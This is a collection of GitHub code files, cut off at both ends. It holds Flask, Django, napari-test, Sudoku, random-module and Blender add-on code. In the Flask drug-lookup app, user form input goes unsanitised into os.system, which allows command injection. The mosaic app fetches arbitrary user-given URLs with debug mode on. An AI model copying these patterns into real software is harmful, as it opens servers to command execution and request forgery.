y_off = int(axis(y,n_y,i.size[1]))\n        if k == 1:\n            if max_y_off < y_off + i.size[1]:\n                max_y_off = y_off + i.size[1]\n        new_img.paste(i, (x_off, y_off))\n        x_off += i.size[0]\n        j += 1\n    new_img.save(\"img/s.jpg\")\n\n\n'''\nFunction returning the distance from the photo to the axis\n'''\n
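# axis() returns the vertical offset that bottom-aligns an image of height h inside a row band of height height/n_y\n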
def axis(height, n_y, h):\n    return ((height / n_y) - h)\n\n\n'''\nScaling the photos\n'''\ndef scale(width, height, img, n_x, n_y):\n    if n_x > 0 and n_y > 0:\n        img.thumbnail((width/n_x,height/n_y))\n    elif n_x > 0:\n        img.thumbnail((width/n_x,height))\n    elif n_y > 0:\n        img.thumbnail((width,height/n_y))\n    else:\n        img.thumbnail((width,height))\n\n\n\n'''\nDisplaying the mosaic\n'''\n@app.route(\"/mozaika\", methods=[\"GET\"])\ndef mozaika():\n    losowo = request.args.get(\"losowo\", 0)\n    rozdzielczosc = request.args.get(\"rozdzielczosc\",\"2048x2048\")\n    zdjecia = request.args.get(\"zdjecia\")\n    (rozdzielczoscX, rozdzielczoscY) = rozdzielczosc.split(\"x\")\n    rozdzielczoscX = int(rozdzielczoscX)\n    rozdzielczoscY = int(rozdzielczoscY)\n    zdjecia = zdjecia.split(\",\")\n    losowo = int(losowo)\n\n    urls = list(map(urllib.request.urlopen,zdjecia))\n    images = list(map(Image.open,urls))\n    \n    create_image(losowo, rozdzielczoscX, rozdzielczoscY, images)\n\n    return send_file(\"img/s.jpg\")\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","repo_name":"ksychla/mosaic","sub_path":"zadanie.py","file_name":"zadanie.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"34835893097","text":"from datetime import date\n\nfrom django.db import connection\n\nfrom leases.utils import calculate_winter_season_start_date\n\n\ndef get_next_sticker_number(lease_start: date) -> int:\n    with connection.cursor() as cursor:\n        sticker_season = get_ws_sticker_season(lease_start)\n        sequence_name = \"ws_stickers_\" + sticker_season\n\n        cursor.execute(\"SELECT nextval(%s)\", [sequence_name])\n        return cursor.fetchone()[0]\n\n\ndef get_ws_sticker_season(lease_start: date) -> str:\n    start_date = calculate_winter_season_start_date(lease_start)\n    start_year = start_date.year\n    end_year = start_year + 1\n    return \"{}_{}\".format(start_year, end_year)\n\n\ndef create_ws_sticker_sequences() -> None:\n    \"\"\"Creates WS sticker sequences for the next 25 years\"\"\"\n    with connection.cursor() as cursor:\n        start_year = 2020\n        for i in range(25):\n            year = start_year + i\n            sql = \"CREATE SEQUENCE IF NOT EXISTS ws_stickers_{}_{} START 1;\".format(\n                year, year + 1\n            )\n            cursor.execute(sql)\n","repo_name":"City-of-Helsinki/berth-reservations","sub_path":"leases/stickers.py","file_name":"stickers.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"}
+{"seq_id":"12940616668","text":"import sys\nimport scrapy\nimport json\nimport os\nfrom subprocess import run\n\n\nfrom flask import *\napp = Flask(__name__)\n\n\n@app.route(\"/home\", methods=[\"GET\", \"POST\"])\ndef home():\n    if request.method == \"POST\":\n        global user_drug_name\n        user_drug_name = request.form[\"Drug_name\"]\n        return redirect('/result')\n    return render_template(\"home.html\")\n\n\n@app.route('/result',methods = ['POST', 'GET'])\ndef result():\n    if request.method == \"POST\":\n        user_drug_name = request.form[\"Drug_name\"]\n        drug_name=user_drug_name\n        str1=\"https://go.drugbank.com/unearth/q?searcher=drugs&query=\"+drug_name \n        command=f'scrapy crawl drug -a start_urls=\"{str1}\" --nolog'\n        curr_dir =os.getcwd()\n        os.chdir(\"./tutorial/tutorial/\")\n        os.system(command)\n        with open('C://Users//U6071514//OneDrive - Clarivate Analytics//Desktop//drug_api_flask_db//tutorial//tutorial//db.json','r') as openfile:\n            json_object=json.load(openfile)\n        output = json_object\n        
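# debug print of the scraped payload before it is returned to the client as JSON\n        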
print(\"\\n\\n data--\", output)\n os.chdir(curr_dir)\n return jsonify(output)\n\nif __name__ == \"__main__\":\n app.run(host='127.0.0.1', port=105)","repo_name":"namanscoding/Medimind","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73039945642","text":"import os\nfrom unittest import mock\n\nimport numpy as np\nimport pytest\nfrom qtpy.QtWidgets import QMessageBox\n\nfrom napari._tests.utils import (\n add_layer_by_type,\n check_viewer_functioning,\n layer_test_data,\n)\nfrom napari.utils.io import imread\n\n\ndef test_qt_viewer(make_napari_viewer):\n \"\"\"Test instantiating viewer.\"\"\"\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n\n assert viewer.title == 'napari'\n assert view.viewer == viewer\n # Check no console is present before it is requested\n assert view._console is None\n\n assert len(viewer.layers) == 0\n assert view.layers.vbox_layout.count() == 2\n\n assert viewer.dims.ndim == 2\n assert view.dims.nsliders == viewer.dims.ndim\n assert np.sum(view.dims._displayed_sliders) == 0\n\n\ndef test_qt_viewer_with_console(make_napari_viewer):\n \"\"\"Test instantiating console from viewer.\"\"\"\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n # Check no console is present before it is requested\n assert view._console is None\n # Check console is created when requested\n assert view.console is not None\n assert view.dockConsole.widget() is view.console\n\n\ndef test_qt_viewer_toggle_console(make_napari_viewer):\n \"\"\"Test instantiating console from viewer.\"\"\"\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n # Check no console is present before it is requested\n assert view._console is None\n # Check console has been created when it is supposed to be shown\n view.toggle_console_visibility(None)\n assert view._console is not None\n assert view.dockConsole.widget() is view.console\n\n\n@pytest.mark.parametrize('layer_class, data, ndim', layer_test_data)\ndef test_add_layer(make_napari_viewer, layer_class, data, ndim):\n viewer = make_napari_viewer(ndisplay=int(np.clip(ndim, 2, 3)))\n view = viewer.window.qt_viewer\n\n add_layer_by_type(viewer, layer_class, data)\n check_viewer_functioning(viewer, view, data, ndim)\n\n\ndef test_new_labels(make_napari_viewer):\n \"\"\"Test adding new labels layer.\"\"\"\n # Add labels to empty viewer\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n\n viewer._new_labels()\n assert np.max(viewer.layers[0].data) == 0\n assert len(viewer.layers) == 1\n assert view.layers.vbox_layout.count() == 2 * len(viewer.layers) + 2\n\n assert viewer.dims.ndim == 2\n assert view.dims.nsliders == viewer.dims.ndim\n assert np.sum(view.dims._displayed_sliders) == 0\n\n # Add labels with image already present\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n\n np.random.seed(0)\n data = np.random.random((10, 15))\n viewer.add_image(data)\n viewer._new_labels()\n assert np.max(viewer.layers[1].data) == 0\n assert len(viewer.layers) == 2\n assert view.layers.vbox_layout.count() == 2 * len(viewer.layers) + 2\n\n assert viewer.dims.ndim == 2\n assert view.dims.nsliders == viewer.dims.ndim\n assert np.sum(view.dims._displayed_sliders) == 0\n\n\ndef test_new_points(make_napari_viewer):\n \"\"\"Test adding new points layer.\"\"\"\n # Add labels to empty viewer\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n\n 
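# add_points() with no arguments creates an empty points layer\n    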
viewer.add_points()\n assert len(viewer.layers[0].data) == 0\n assert len(viewer.layers) == 1\n assert view.layers.vbox_layout.count() == 2 * len(viewer.layers) + 2\n\n assert viewer.dims.ndim == 2\n assert view.dims.nsliders == viewer.dims.ndim\n assert np.sum(view.dims._displayed_sliders) == 0\n\n # Add points with image already present\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n\n np.random.seed(0)\n data = np.random.random((10, 15))\n viewer.add_image(data)\n viewer.add_points()\n assert len(viewer.layers[1].data) == 0\n assert len(viewer.layers) == 2\n assert view.layers.vbox_layout.count() == 2 * len(viewer.layers) + 2\n\n assert viewer.dims.ndim == 2\n assert view.dims.nsliders == viewer.dims.ndim\n assert np.sum(view.dims._displayed_sliders) == 0\n\n\ndef test_new_shapes_empty_viewer(make_napari_viewer):\n \"\"\"Test adding new shapes layer.\"\"\"\n # Add labels to empty viewer\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n\n viewer.add_shapes()\n assert len(viewer.layers[0].data) == 0\n assert len(viewer.layers) == 1\n assert view.layers.vbox_layout.count() == 2 * len(viewer.layers) + 2\n\n assert viewer.dims.ndim == 2\n assert view.dims.nsliders == viewer.dims.ndim\n assert np.sum(view.dims._displayed_sliders) == 0\n\n # Add points with image already present\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n\n np.random.seed(0)\n data = np.random.random((10, 15))\n viewer.add_image(data)\n viewer.add_shapes()\n assert len(viewer.layers[1].data) == 0\n assert len(viewer.layers) == 2\n assert view.layers.vbox_layout.count() == 2 * len(viewer.layers) + 2\n\n assert viewer.dims.ndim == 2\n assert view.dims.nsliders == viewer.dims.ndim\n assert np.sum(view.dims._displayed_sliders) == 0\n\n\ndef test_z_order_adding_removing_images(make_napari_viewer):\n \"\"\"Test z order is correct after adding/ removing images.\"\"\"\n data = np.ones((10, 10))\n\n viewer = make_napari_viewer()\n vis = viewer.window.qt_viewer.layer_to_visual\n viewer.add_image(data, colormap='red', name='red')\n viewer.add_image(data, colormap='green', name='green')\n viewer.add_image(data, colormap='blue', name='blue')\n order = [vis[x].order for x in viewer.layers]\n np.testing.assert_almost_equal(order, list(range(len(viewer.layers))))\n\n # Remove and re-add image\n viewer.layers.remove('red')\n order = [vis[x].order for x in viewer.layers]\n np.testing.assert_almost_equal(order, list(range(len(viewer.layers))))\n viewer.add_image(data, colormap='red', name='red')\n order = [vis[x].order for x in viewer.layers]\n np.testing.assert_almost_equal(order, list(range(len(viewer.layers))))\n\n # Remove two other images\n viewer.layers.remove('green')\n viewer.layers.remove('blue')\n order = [vis[x].order for x in viewer.layers]\n np.testing.assert_almost_equal(order, list(range(len(viewer.layers))))\n\n # Add two other layers back\n viewer.add_image(data, colormap='green', name='green')\n viewer.add_image(data, colormap='blue', name='blue')\n order = [vis[x].order for x in viewer.layers]\n np.testing.assert_almost_equal(order, list(range(len(viewer.layers))))\n\n\ndef test_screenshot(make_napari_viewer):\n \"Test taking a screenshot\"\n viewer = make_napari_viewer()\n\n np.random.seed(0)\n # Add image\n data = np.random.random((10, 15))\n viewer.add_image(data)\n\n # Add labels\n data = np.random.randint(20, size=(10, 15))\n viewer.add_labels(data)\n\n # Add points\n data = 20 * np.random.random((10, 2))\n viewer.add_points(data)\n\n # Add vectors\n data = 20 * 
np.random.random((10, 2, 2))\n viewer.add_vectors(data)\n\n # Add shapes\n data = 20 * np.random.random((10, 4, 2))\n viewer.add_shapes(data)\n\n # Take screenshot\n screenshot = viewer.window.qt_viewer.screenshot()\n assert screenshot.ndim == 3\n\n\n@pytest.mark.skip(\"new approach\")\ndef test_screenshot_dialog(make_napari_viewer, tmpdir):\n \"\"\"Test save screenshot functionality.\"\"\"\n viewer = make_napari_viewer()\n\n np.random.seed(0)\n # Add image\n data = np.random.random((10, 15))\n viewer.add_image(data)\n\n # Add labels\n data = np.random.randint(20, size=(10, 15))\n viewer.add_labels(data)\n\n # Add points\n data = 20 * np.random.random((10, 2))\n viewer.add_points(data)\n\n # Add vectors\n data = 20 * np.random.random((10, 2, 2))\n viewer.add_vectors(data)\n\n # Add shapes\n data = 20 * np.random.random((10, 4, 2))\n viewer.add_shapes(data)\n\n # Save screenshot\n input_filepath = os.path.join(tmpdir, 'test-save-screenshot')\n mock_return = (input_filepath, '')\n with mock.patch('napari._qt.qt_viewer.QFileDialog') as mocker, mock.patch(\n 'napari._qt.qt_viewer.QMessageBox'\n ) as mocker2:\n mocker.getSaveFileName.return_value = mock_return\n mocker2.warning.return_value = QMessageBox.Yes\n viewer.window.qt_viewer._screenshot_dialog()\n # Assert behaviour is correct\n expected_filepath = input_filepath + '.png' # add default file extension\n assert os.path.exists(expected_filepath)\n output_data = imread(expected_filepath)\n expected_data = viewer.window.qt_viewer.screenshot()\n assert np.allclose(output_data, expected_data)\n\n\n@pytest.mark.parametrize(\n \"dtype\", ['int8', 'uint8', 'int16', 'uint16', 'float32']\n)\ndef test_qt_viewer_data_integrity(make_napari_viewer, dtype):\n \"\"\"Test that the viewer doesn't change the underlying array.\"\"\"\n\n image = np.random.rand(10, 32, 32)\n image *= 200 if dtype.endswith('8') else 2 ** 14\n image = image.astype(dtype)\n imean = image.mean()\n\n viewer = make_napari_viewer()\n\n viewer.add_image(image.copy())\n datamean = viewer.layers[0].data.mean()\n assert datamean == imean\n # toggle dimensions\n viewer.dims.ndisplay = 3\n datamean = viewer.layers[0].data.mean()\n assert datamean == imean\n # back to 2D\n viewer.dims.ndisplay = 2\n datamean = viewer.layers[0].data.mean()\n assert datamean == imean\n\n\ndef test_points_layer_display_correct_slice_on_scale(make_napari_viewer):\n viewer = make_napari_viewer()\n data = np.zeros((60, 60, 60))\n viewer.add_image(data, scale=[0.29, 0.26, 0.26])\n pts = viewer.add_points(name='test', size=1, ndim=3)\n pts.add((8.7, 0, 0))\n viewer.dims.set_point(0, 30 * 0.29) # middle plane\n layer = viewer.layers[1]\n indices, scale = layer._slice_data(layer._slice_indices)\n np.testing.assert_equal(indices, [0])\n","repo_name":"zzalscv2/napari","sub_path":"napari/_qt/_tests/test_qt_viewer.py","file_name":"test_qt_viewer.py","file_ext":"py","file_size_in_byte":9751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36549062640","text":"import unittest\n\nclass Solution:\n def isValidSudoku2(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n empty = \".\"\n\n rows = [set() for _ in range(len(board))]\n columns = [set() for _ in range(len(board[0]))]\n sub_boxes = [\n set() for _ in range(len(board)) for _ in range(len(board[0]))\n ]\n\n for x in range(len(board)):\n for y in range(len(board[0])):\n if board[x][y] == empty:\n continue\n\n if board[x][y] in rows[x]:\n print(1)\n print(rows)\n print(x)\n 
print(y)\n print(board[x][y])\n return False\n else:\n rows[x].add(board[x][y])\n\n if board[x][y] in columns[y]:\n print(2)\n return False\n else:\n columns[y].add(board[x][y])\n\n box_num = x // 3 * len(board[0]) // 3 + y // 3\n if board[x][y] in sub_boxes[box_num]:\n print(3)\n return False\n else:\n sub_boxes[box_num].add(board[x][y])\n\n return True\n\n def isValidSudoku(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n empty = \".\"\n\n rows = {k: set() for k in range(len(board))}\n columns = {k: set() for k in range(len(board[0]))}\n sub_boxes = {(x, y): set() for x in range(0, 3) for y in range(0, 3)}\n\n for x in range(len(board)):\n for y in range(len(board[0])):\n if board[x][y] == empty:\n continue\n\n if board[x][y] in rows[x]:\n return False\n else:\n rows[x].add(board[x][y])\n\n if board[x][y] in columns[y]:\n return False\n else:\n columns[y].add(board[x][y])\n\n if board[x][y] in sub_boxes[(x // 3, y // 3)]:\n return False\n else:\n sub_boxes[(x // 3, y // 3)].add(board[x][y])\n\n return True\n\n def isValidSudoku3it(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n empty = \".\"\n\n # Check 1st rule\n for x in range(len(board)):\n row = set()\n for y in range(len(board[0])):\n if board[x][y] == empty:\n continue\n if board[x][y] in row:\n return False\n else:\n row.add(board[x][y])\n\n # Check 2nd rule\n for y in range(len(board[0])):\n column = set()\n for x in range(len(board)):\n if board[x][y] == empty:\n continue\n if board[x][y] in column:\n return False\n else:\n column.add(board[x][y])\n\n # Check 3rd rule\n sub_boxes = 3\n sub_box_step_x = int(len(board) / sub_boxes)\n sub_box_step_y = int(len(board) / sub_boxes)\n for sub_x in range(0, len(board), sub_box_step_x):\n for sub_y in range(0, len(board[0]), sub_box_step_y):\n sub_box = set()\n for x in range(sub_x, sub_x + sub_box_step_x):\n for y in range(sub_y, sub_y + sub_box_step_y):\n if board[x][y] == empty:\n continue\n if board[x][y] in sub_box:\n return False\n else:\n sub_box.add(board[x][y])\n\n return True\n\n\nclass Tests(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def tests(self):\n self.assertTrue(self.sol.isValidSudoku([[\".\"] * 9] * 9))\n self.assertTrue(\n self.sol.isValidSudoku(\n [\n [\"5\", \"3\", \".\", \".\", \"7\", \".\", \".\", \".\", \".\"],\n [\"6\", \".\", \".\", \"1\", \"9\", \"5\", \".\", \".\", \".\"],\n [\".\", \"9\", \"8\", \".\", \".\", \".\", \".\", \"6\", \".\"],\n [\"8\", \".\", \".\", \".\", \"6\", \".\", \".\", \".\", \"3\"],\n [\"4\", \".\", \".\", \"8\", \".\", \"3\", \".\", \".\", \"1\"],\n [\"7\", \".\", \".\", \".\", \"2\", \".\", \".\", \".\", \"6\"],\n [\".\", \"6\", \".\", \".\", \".\", \".\", \"2\", \"8\", \".\"],\n [\".\", \".\", \".\", \"4\", \"1\", \"9\", \".\", \".\", \"5\"],\n [\".\", \".\", \".\", \".\", \"8\", \".\", \".\", \"7\", \"9\"],\n ]\n )\n )\n self.assertFalse(\n self.sol.isValidSudoku(\n [\n [\"8\", \"3\", \".\", \".\", \"7\", \".\", \".\", \".\", \".\"],\n [\"6\", \".\", \".\", \"1\", \"9\", \"5\", \".\", \".\", \".\"],\n [\".\", \"9\", \"8\", \".\", \".\", \".\", \".\", \"6\", \".\"],\n [\"8\", \".\", \".\", \".\", \"6\", \".\", \".\", \".\", \"3\"],\n [\"4\", \".\", \".\", \"8\", \".\", \"3\", \".\", \".\", \"1\"],\n [\"7\", \".\", \".\", \".\", \"2\", \".\", \".\", \".\", \"6\"],\n [\".\", \"6\", \".\", \".\", \".\", \".\", \"2\", \"8\", \".\"],\n [\".\", \".\", \".\", \"4\", \"1\", \"9\", \".\", \".\", \"5\"],\n [\".\", \".\", \".\", \".\", \"8\", \".\", \".\", 
\"7\", \"9\"],\n                ]\n            )\n        )\n\n\nunittest.main()\n","repo_name":"fspv/learning","sub_path":"l33tcode/valid-sudoku.py","file_name":"valid-sudoku.py","file_ext":"py","file_size_in_byte":5456,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"19"}
+{"seq_id":"37569815507","text":"# Zachary Hoover || 9-20-23 || Guided Practice #14\n\ndef print_header(title):\n    \"\"\"Prints header with title.\"\"\"\n    print(\"\\n ------+ \" + title + \" +------\\n\")\n    return\n\n# imports\nimport random\nimport os\n\n# Code to clear the screen before running\nclear = lambda: os.system('clear' if os.name == 'posix' else 'cls')\nclear()\n\nprint_header(\"Choice Introduction\")\n\nfruits = ['apple', 'banana', 'orange', 'mango', 'kiwi']\nrandom_fruit = random.choice(fruits)\nprint(\" The randomly selected fruit is:\", random_fruit)\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"choice() - Example 1\")\n\nwwe_wrestlers = ['John Cena', 'The Rock', 'Stone Cold Steve Austin', 'Triple H', 'Undertaker']\nrandom_wwe_wrestler = random.choice(wwe_wrestlers)\nprint(f\" The randomly selected WWE wrestler is: {random_wwe_wrestler}\")\n\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"choice() - Example 2\")\n\naew_wrestlers = ['Chris Jericho', 'Jon Moxley', 'Darby Allin', 'Kenny Omega', 'Sting']\nrandom_aew_wrestler = random.choice(aew_wrestlers)\nprint(f\" The randomly selected AEW wrestler is: {random_aew_wrestler}\")\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"choice() - Example 3\")\n\nwwe_wrestlers = ['Austin Theory', 'Brock Lesnar', 'Johnny Gargano', 'Tommaso Ciampa', 'Roman Reigns']\nrand_wwe1 = random.choice(wwe_wrestlers)\nrand_wwe2 = random.choice(wwe_wrestlers)\n\nwhile rand_wwe1 == rand_wwe2:\n    rand_wwe2 = random.choice(wwe_wrestlers)\n    \nprint(f' The randomly selected WWE match is between {rand_wwe1} and {rand_wwe2}')\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"choice() - Example 4\")\n\naew_teams = [\n    ['Jon Moxley', 'Wheeler Yuta', 'Claudio Castagnoli'],\n    ['Nick Jackson', 'Matt Jackson', 'Kenny Omega'],\n    ['Pac', 'Penta El Zero Miedo', 'Rey Fenix']\n]\n\nrand_team1 = random.choice(aew_teams)\nrand_team2 = random.choice(aew_teams)\n\nwhile rand_team1 == rand_team2:\n    rand_team2 = random.choice(aew_teams)\n    \nprint(' The randomly selected AEW trios Tag team match is between ' + rand_team1[0] + ', ' + rand_team1[1] + ', ' + rand_team1[2] + ', and ' + rand_team2[0] + ', ' + rand_team2[1] + ', ' + rand_team2[2])\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"sample() - Example 1\")\n\nweapons = ['Poltergust G-OO', 'Strobulb', 'Dark-Light device', 'Suction Shot']\nrandom_weapon = random.sample(weapons, k=1)\n\nprint(f' The randomly selected weapon is: {random_weapon}')\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"sample() - Example 2\")\n\ngems = ['Diamond', 'Ruby', 'Emerald', 'Sapphire']\nrandom_gems = random.sample(gems, 2)\n\nprint(\" \", random_gems)\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"sample() - Example 3\")\n\nfloors = [\"B1\", \"2F\", \"5F\", \"8F\", \"10F\"]\nrandom_floors = random.sample(floors, k=len(floors))\n\nprint(\" \", random_floors)\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"sample() - Example 4\")\n\nghosts = ['Polterkitty', 'Goob', 'Hammers', 'Slinker', 'Kruller', 'Boos']\nrandom_ghost = random.sample(ghosts, 1)\n\nprint(\" \", random_ghost)\n\ninput(\"\\n Press Enter to Continue...\")\n
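# seed() fixes the generator state - reseeding with the same value (42 below) reproduces the same draws\n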
print_header(\"Seed Introduction\")\n\nrandom.seed(42)\nprint(' ', random.random())\n\nprint() # Spacer\n\nrandom.seed(42)\nprint(' ', random.randint(1, 10))\n\nprint() # Spacer\n\nrandom.seed(1234)\nprint(' ', random.random())\n\nrandom.seed(5678)\nprint(' ', random.random())\n\ninput(\"\\n Press Enter to Continue...\")","repo_name":"CyberSurge-Dev/Python2","sub_path":"Module 3/guidedPractice15.py","file_name":"guidedPractice15.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"4041776563","text":"bl_info = {\n\t\"name\": \"SOT\",\n\t\"author\": \"IIIFGIII (Discord IIIFGIII#7758)\",\n\t\"version\": (1, 2),\n\t\"blender\": (2, 83, 0),\n\t\"location\": \"View3D > N panel > FGT > SOT\",\n\t\"description\": \"Set Origin Transform (SOT) tool. Tested on versions 2.83.18 and 2.93.4. For bug report/feedback contact me in Discord.\",\n\t\"warning\": \"\",\n\t\"wiki_url\": \"https://github.com/IIIFGIII/FG_Tools\",\n\t\"category\": \"FG_Tools\",\n}\n\nimport bpy, bmesh, math, bgl, gpu, time\nimport numpy as np\nimport mathutils as mu\nfrom gpu_extras.batch import batch_for_shader\n\nbpr = bpy.props\n\n\npr_values = {}\nsob_mts = {}\nspot_orient_matrix = mu.Matrix.Identity(3)\nnvdata = np.empty(0, dtype=np.float32)\nmnvdata = []\nsvdata = np.empty(0, dtype=np.float32)\nmsvdata = []\nsps_data = []\nrot_update = 0 \nloc_mode_current = '1'\n\nspot_mode_space_check = None\nspot_projection_check = None\nspot_sob_matrices_vdata = []\nspot_orient_matrix = None\nspot_sps_data = []\nspot_psp_data = []\n\nshapes = [\n\t[(-0.2,0,0),(-0.05,0,0), (0.05,0,0),(0.2,0,0), (0,0,0),(-0.1,0.1,0), (-0.1,0.1,0),(0.1,0.1,0), (0.1,0.1,0),(0,0,0)],\n\t[(-0.1,-0.1,0),(-0.1,0.1,0), (-0.1,0.1,0),(0.1,0.1,0), (0.1,0.1,0),(0.1,-0.1,0), (0.1,-0.1,0),(-0.1,-0.1,0)],\n\t[(-0.1,0,0),(0,0.1,0), (0,0.1,0),(0.1,0,0), (0.1,0,0),(0,-0.1,0), (0,-0.1,0),(-0.1,0,0)],\n\t[(-0.1,-0.1,0),(0,0,0), (0,0,0),(0.1,-0.1,0), (0.1,-0.1,0),(-0.1,-0.1,0)],\n\t[(0.2,0.2,0),(0.05,0.05,0), (-0.2,0.2,0),(-0.05,0.05,0), (-0.2,-0.2,0),(-0.05,-0.05,0), (0.2,-0.2,0),(0.05,-0.05,0),]]\n\n#Colors = white spots, border mesh spot, bound center spot, center of mass spot, \n#\t\t X, Y, Z axis \n#\t\t bound front/back\n# \t\t drop point , drop lines A,B,C\ncolors = [(1.0, 1.0, 1.0, 1.0),(0, 0.9, 1.0, 1.0),(0.9, 0.2, 0.2, 1.0),(1.0, 0.5, 0.05, 1.0),\n\t\t (1.0, 0.2, 0.2, 1.0),(0.4, 1, 0.0, 1.0),(0.0 , 0.5, 1.0, 1.0),\n\t\t (1.0, 0.85, 0.15, 1.0),(0.6, 0.5, 0.2, 1.0),\n\t\t (1.0, 0.1, 0.8, 1.0), (1.0, 0.65, 0.95, 1.0), (0.6, 0.6, 0.6, 1.0)]\n\ngrid = [(-2,2.25,0),(-2,-2.25,0), (-1,2.25,0),(-1,-2.25,0), (0,2.25,0),(0,-2.25,0), (1,2.25,0),(1,-2.25,0), (2,2.25,0),(2,-2.25,0),\n\t\t(2.25,-2,0),(-2.25,-2,0), (2.25,-1,0),(-2.25,-1,0), (2.25,0,0),(-2.25,0,0), (2.25,1,0),(-2.25,1,0), (2.25,2,0),(-2.25,2,0)]\n\n
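# axis_base pairs each vertex with a color - five segments per axis drawing the X (red), Y (green) and Z (blue) arrows\n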
axis_base =[((-1.5,0,0),(colors[4])),((1.5,0,0),(colors[4])),\n\t\t\t((1.4,0.1,0.1),(colors[4])),((1.5,0,0),(colors[4])),\n\t\t\t((1.4,0.1,-0.1),(colors[4])),((1.5,0,0),(colors[4])),\n\t\t\t((1.4,-0.1,-0.1),(colors[4])),((1.5,0,0),(colors[4])),\n\t\t\t((1.4,-0.1,0.1),(colors[4])),((1.5,0,0),(colors[4])),\n\n\t\t\t((0,-1.5,0),(colors[5])),((0,1.5,0),(colors[5])),\n\t\t\t((0.1,1.4,0.1),(colors[5])),((0,1.5,0),(colors[5])),\n\t\t\t((-0.1,1.4,0.1),(colors[5])),((0,1.5,0),(colors[5])),\n\t\t\t((-0.1,1.4,-0.1),(colors[5])),((0,1.5,0),(colors[5])),\n\t\t\t((0.1,1.4,-0.1),(colors[5])),((0,1.5,0),(colors[5])),\n\n\t\t\t((0,0,-1.5),(colors[6])),((0,0,1.5),(colors[6])),\n\t\t\t((0.1,0.1,1.4),(colors[6])),((0,0,1.5),(colors[6])),\n\t\t\t((-0.1,0.1,1.4),(colors[6])),((0,0,1.5),(colors[6])),\n\t\t\t((-0.1,-0.1,1.4),(colors[6])),((0,0,1.5),(colors[6])),\n\t\t\t((0.1,-0.1,1.4),(colors[6])),((0,0,1.5),(colors[6]))]\n\n\ndef report(self,message):\n\tself.report({'ERROR'}, message)\n\treturn{'CANCELLED'}\n\ndef unic_name_geterator(name, existing_names, use_exception = False, excepted_name = ''):\n\tname_is_unic = False\n\tfirst_check = True\n\n\twhile not name_is_unic:\n\t\tname_is_unic = True\n\t\tfor en in existing_names:\n\t\t\tif use_exception and name == excepted_name:\n\t\t\t\tname_is_unic = True\n\t\t\t\tbreak\t\t\t\t\n\t\t\telif first_check and name == en and name[-4] == '.' and name[-3:].isnumeric():\n\t\t\t\tname = name[:-3] + '001'\n\t\t\t\tname_is_unic = False\n\t\t\t\tfirst_check = False\n\t\t\t\tbreak\n\t\t\telif first_check and name == en: \n\t\t\t\tname = name + '.001'\n\t\t\t\tname_is_unic = False\n\t\t\t\tfirst_check = False\n\t\t\t\tbreak\n\t\t\telif name == en:\n\t\t\t\tnum = str(int(name[-3:])+1)\n\t\t\t\tzeros = '00' if len(num) == 1 else '0'\n\t\t\t\tnum = zeros + num if len(num) != 3 else num \n\t\t\t\tname = name[:-3] + num\n\t\t\t\tname_is_unic = False\n\t\t\t\tbreak\n\n\treturn name\t\n\ndef combine_matrix_v3(v1,v2,v3):\n\tmt = mu.Matrix.Identity(3)\n\tmt.col[0] = v1\n\tmt.col[1] = v2\n\tmt.col[2] = v3\n\treturn mt\n\ndef Vector(vec):\n\treturn mu.Vector(vec)\n\ndef tov4(xyz,w):\n\treturn mu.Vector((xyz[0],xyz[1],xyz[2],w))\n\ndef vector_fix(obm,vector):\n\treturn (obm.inverted_safe().transposed().to_3x3() @ vector).normalized()\n\ndef distance(va,vb):\n\treturn math.sqrt((vb[0]-va[0])**2+(vb[1]-va[1])**2+(vb[2]-va[2])**2)\n\ndef remap(va,vb,ra,rb,rv):\n\tif va == vb or ra == rb: return va\n\telse:\n\t\tif ra<rb and rv<=ra or ra>rb and rv>=ra: return va\n\t\telif ra<rb and rv>=rb or ra>rb and rv<=rb: return vb\n\t\telse: return (va+(((rv-ra)/(rb-ra))*(vb-va)))\n\n
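# vectors_remap reorients a basis so the axis chosen in sot.z_axis maps to local Z, with the rem_* presets rotating X/Y around it\n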
